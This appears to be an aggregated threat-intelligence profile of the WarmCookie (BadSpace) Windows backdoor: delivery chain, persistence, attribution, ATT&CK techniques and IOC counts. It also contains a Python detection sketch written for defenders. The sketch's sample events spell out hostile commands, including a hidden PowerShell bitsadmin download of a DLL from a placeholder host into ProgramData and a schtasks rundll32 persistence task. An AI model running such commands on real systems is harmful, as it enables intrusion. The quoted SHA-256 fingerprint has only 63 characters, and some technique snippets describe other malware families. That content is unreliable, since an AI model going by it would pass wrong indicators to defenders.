WarmCookie
WarmCookie, also known as BadSpace, is a Windows backdoor malware family first observed in April 2024 and still actively developed. It is primarily distributed through malspam, phishing, compromised websites, malicious downloads, and malvertising, including lures themed as invoices, job offers, job-related attachments, fake browser updates, and ZIP-delivered malicious JavaScript. Reported infection chains include obfuscated JavaScript launching PowerShell and Bitsadmin to download and execute a WarmCookie DLL. WarmCookie is used to obtain persistent, long-term access to victim environments and can enable remote access, reconnaissance, command execution, file manipulation, screenshot capture, data theft and exfiltration, and deployment of additional payloads. Follow-on payloads named in the cited reporting include CSharp-Streamer-RAT and Cobalt Strike; ANSSI also states it has been used to deploy Interlock ransomware and may have been used for espionage.
WarmCookie establishes persistence via Windows Task Scheduler, including scheduled tasks created under paths such as %ALLUSERSPROFILE% or %ALLDATA%, and re-executes itself after a delay. Newer variants changed execution syntax from "/p" to "/u" and introduced improved evasion, including randomized "string bank" persistence names derived from legitimate-sounding company names, dual GUID-like mutexes, campaign ID fields, and more legitimate-looking browser user-agent strings. Recent variants add or refine handlers to execute EXE, DLL, and PowerShell payloads, including DLL execution via rundll32.exe with a specified export, and include self-update and persistence-removal functionality. Researchers also reported RC4-key-based clustering of samples and reuse of an SSL certificate on C2 infrastructure, including continued use after expiration; one reported certificate SHA-256 fingerprint is 8c5522c6f2ca22af8db14d404dbf5647a1eba13f2b0f73b0a06d8e304bd89cc.
The malware has been linked in reporting to TA866 through code and functional similarities with the Resident backdoor, and Proofpoint reported TA584 has used WarmCookie as a payload. WarmCookie has also been distributed through CastleLoader/CastleBot-related activity and was included among malware families targeted by Operation Endgame in May 2025. Reporting states it has targeted organizations across multiple sectors.
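As an added example (not code from the cited reports or from the Mallory platform), the following Python sketch turns the delivery and persistence chain summarized above into detection rules and runs them over constructed process-creation events: a script host spawning PowerShell, bitsadmin fetching a DLL, a scheduled task whose action is rundll32 loading a DLL under %ALLUSERSPROFILE% with a named export, and that task later firing. The event records, file names, task name, URL and export name are all constructed placeholders; the field layout mimics Sysmon Event ID 1 but is an assumption of this example.

```python
"""Detection sketch for the WarmCookie-style delivery and persistence chain.

Added example, not code from any vendor report or from Mallory. Event fields
mimic Sysmon Event ID 1 (process creation); every record below is constructed
and the URL, DLL name, task name and export name are placeholders.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the created process
    cmdline: str        # command line as logged
    parent_image: str
    parent_pid: int


@dataclass
class Alert:
    rule: str
    pid: int
    detail: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# %ALLUSERSPROFILE% normally expands to C:\ProgramData; accept either spelling.
PROGRAMDATA = re.compile(r"(?:%ALLUSERSPROFILE%|c:\\programdata)\\", re.IGNORECASE)
# "rundll32.exe <dll>,<Export>" or "rundll32.exe <dll> <Export>"
RUNDLL_EXPORT = re.compile(r"rundll32(?:\.exe)?\s+\"?([^\s\",]+\.dll)\"?[\s,]+(\w+)", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_script_host_spawns_powershell(ev: ProcEvent):
    # Stage 1: the ZIP-delivered JavaScript runs under wscript/cscript and launches PowerShell.
    if basename(ev.parent_image) in SCRIPT_HOSTS and basename(ev.image) == "powershell.exe":
        return Alert("script_host_spawns_powershell", ev.pid, ev.cmdline)
    return None


def rule_bitsadmin_fetches_dll(ev: ProcEvent):
    # Stage 2: bitsadmin /transfer used to pull a DLL to disk.
    cl = ev.cmdline.lower()
    if basename(ev.image) == "bitsadmin.exe" and "/transfer" in cl and ".dll" in cl:
        return Alert("bitsadmin_fetches_dll", ev.pid, ev.cmdline)
    return None


def rule_task_runs_rundll32_from_programdata(ev: ProcEvent):
    # Stage 3: schtasks /create whose action is rundll32 <ProgramData DLL>,<export>.
    if basename(ev.image) != "schtasks.exe" or "/create" not in ev.cmdline.lower():
        return None
    m = RUNDLL_EXPORT.search(ev.cmdline)
    if m and PROGRAMDATA.search(m.group(1)):
        return Alert("task_runs_rundll32_from_programdata", ev.pid, f"dll={m.group(1)} export={m.group(2)}")
    return None


def rule_rundll32_export_from_programdata(ev: ProcEvent):
    # Stage 4: the task firing: rundll32 loading a DLL from ProgramData by a named export.
    if basename(ev.image) != "rundll32.exe":
        return None
    m = RUNDLL_EXPORT.search(ev.cmdline)
    if m and PROGRAMDATA.search(m.group(1)):
        return Alert("rundll32_export_from_programdata", ev.pid, f"dll={m.group(1)} export={m.group(2)}")
    return None


RULES = [rule_script_host_spawns_powershell, rule_bitsadmin_fetches_dll,
         rule_task_runs_rundll32_from_programdata, rule_rundll32_export_from_programdata]


def analyze(events):
    """Run every rule over every event; return alerts in event order."""
    return [a for ev in events for rule in RULES if (a := rule(ev))]


def chained_pids(events, alerts):
    """PIDs of alerted processes whose parent also alerted: evidence of one chain, not isolated hits."""
    alerted = {a.pid for a in alerts}
    by_pid = {ev.pid: ev for ev in events}
    return sorted(pid for pid in alerted if by_pid[pid].parent_pid in alerted)


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry, not a real capture
    ProcEvent(100, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\victim\Downloads\invoice.js"', r"C:\Windows\explorer.exe", 10),
    ProcEvent(200, PS, r'powershell.exe -w hidden -c "bitsadmin /transfer job /download /priority normal http://example.invalid/x.dll C:\ProgramData\x.dll"', r"C:\Windows\System32\wscript.exe", 100),
    ProcEvent(300, r"C:\Windows\System32\bitsadmin.exe", r"bitsadmin /transfer job /download /priority normal http://example.invalid/x.dll C:\ProgramData\x.dll", PS, 200),
    ProcEvent(400, r"C:\Windows\System32\schtasks.exe", r'schtasks.exe /create /tn "ExampleCorp Update" /tr "rundll32.exe C:\ProgramData\x.dll,Start" /sc minute /mo 1', PS, 200),
    ProcEvent(500, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\ProgramData\x.dll,Start", r"C:\Windows\System32\svchost.exe", 20),
    # benign noise: rundll32 from System32 and an interactive PowerShell must not alert
    ProcEvent(600, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL", r"C:\Windows\explorer.exe", 10),
    ProcEvent(700, PS, "powershell.exe -c Get-Process", r"C:\Windows\explorer.exe", 10),
]

if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a.rule}] pid={a.pid} {a.detail}")
    print("chained:", chained_pids(SAMPLE_EVENTS, found))
```

The parent-child linkage in `chained_pids` is what separates this chain from the individually noisy parts (rundll32 and schtasks are common in healthy systems); in production the ProgramData path check would be widened to whatever the scheduled task actually points at, since the reports say task names are drawn from a bank of legitimate-sounding company names and cannot be matched by string.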
Groups observed using it
3 distinct threat actors attributed by public researchers.
WarmCookie, also known as BadSpace, is a sophisticated malware family that emerged in April 2024, primarily distributed through malspam and malvertising. This malware provides long-term access to compromised environments and facilitates the deployment of additional payloads, such as CSharp-Streamer-RAT and Cobalt Strike.
"...a new backdoor “BadSpace”..."; "...the malware’s alias name WarmCookie."
Proofpoint says TA584 has used a large number of payloads over the years, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, and DCRAT.
Techniques & procedures
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Latrodectus - a sophisticated malware loader first spotted in 2023 used by threat actors like TA578 in phishing campaigns... it is delivered via malicious email attachments.
WarmCookie’s infection chain initiates through email lures—typically invoice-related and job agency themes—that direct victims to malicious JavaScript-hosting servers.
“The currently prevalent attack chain begins with emails sent from hundreds of compromised, aged accounts, delivered via SendGrid and Amazon Simple Email Service (SES). The emails include unique URLs for each target…”
Execution
8 techniques
WarmCookie leverages Task Scheduler to achieve persistence, creating scheduled tasks under %ALLUSERSPROFILE% or %ALLDATA%, and re-executing itself after a 60-second delay.
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command that uses Bitsadmin to download and execute the WarmCookie DLL
Process chain shown includes "Conhost.exe" following execution: "rundll32.exe ... 40FC.exe ... Conhost.exe"
Warm Cookie - is a backdoor distributed via phishing emails and malicious downloads. It uses deceptive lures, such as job-related attachments, to trick users into executing malicious payloads.
Persistence
3 techniques
WarmCookie leverages Task Scheduler to achieve persistence, creating scheduled tasks under %ALLUSERSPROFILE% or %ALLDATA%, and re-executing itself after a 60-second delay.
Privilege Escalation
2 techniques
WarmCookie leverages Task Scheduler to achieve persistence, creating scheduled tasks under %ALLUSERSPROFILE% or %ALLDATA%, and re-executing itself after a 60-second delay.
Stealth
5 techniques
"campaign markers embedded as RC4 keys" and code references to decrypted strings (e.g., "StringDecrypt" / "StringDecrypt2")
It uses deceptive lures, such as job-related attachments, to trick users into executing malicious payloads.
"New variants now embed two separate GUID-like mutexes, which are used for better control over initialization and synchronization"
They both use rundll32.exe for DLL-based execution and task scheduling.
Collection
1 technique
DanaBot – initially discovered as a modular banking Trojan in 2018... It primarily aims to steal banking credentials, browser data, and personal information.
Command and Control
4 techniques
TA866 previously used unique, detectable C2 user-agent strings (e.g., Mozilla/4.0 (compatible; MSIE 6.0…)), which have since been updated to blend with standard strings like Mozilla/5.0… Firefox/115.0.
Command 0x8: Receives a DLL from C2, assigns it a temporary filename, and executes it.
Command 0xA: Similar to Command 0x8 but adds hardcoded parameters, allowing self-updating.
Warm Cookie - is a backdoor... Once active, it enables remote access, data theft, and further malware deployment via a botnet command and controller.
IOCs tracked for this family
24 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
21 sources tracked across advisories, community write-ups, and news.
Named as a remote access trojan distributed by CastleLoader.
Previously distributed payload in TA584 activity; specific functionality not described in the provided content.
Previously used malware family in TA584 activity (mentioned historically).
Referenced as a historical payload used by TA584 (no additional details provided in the content).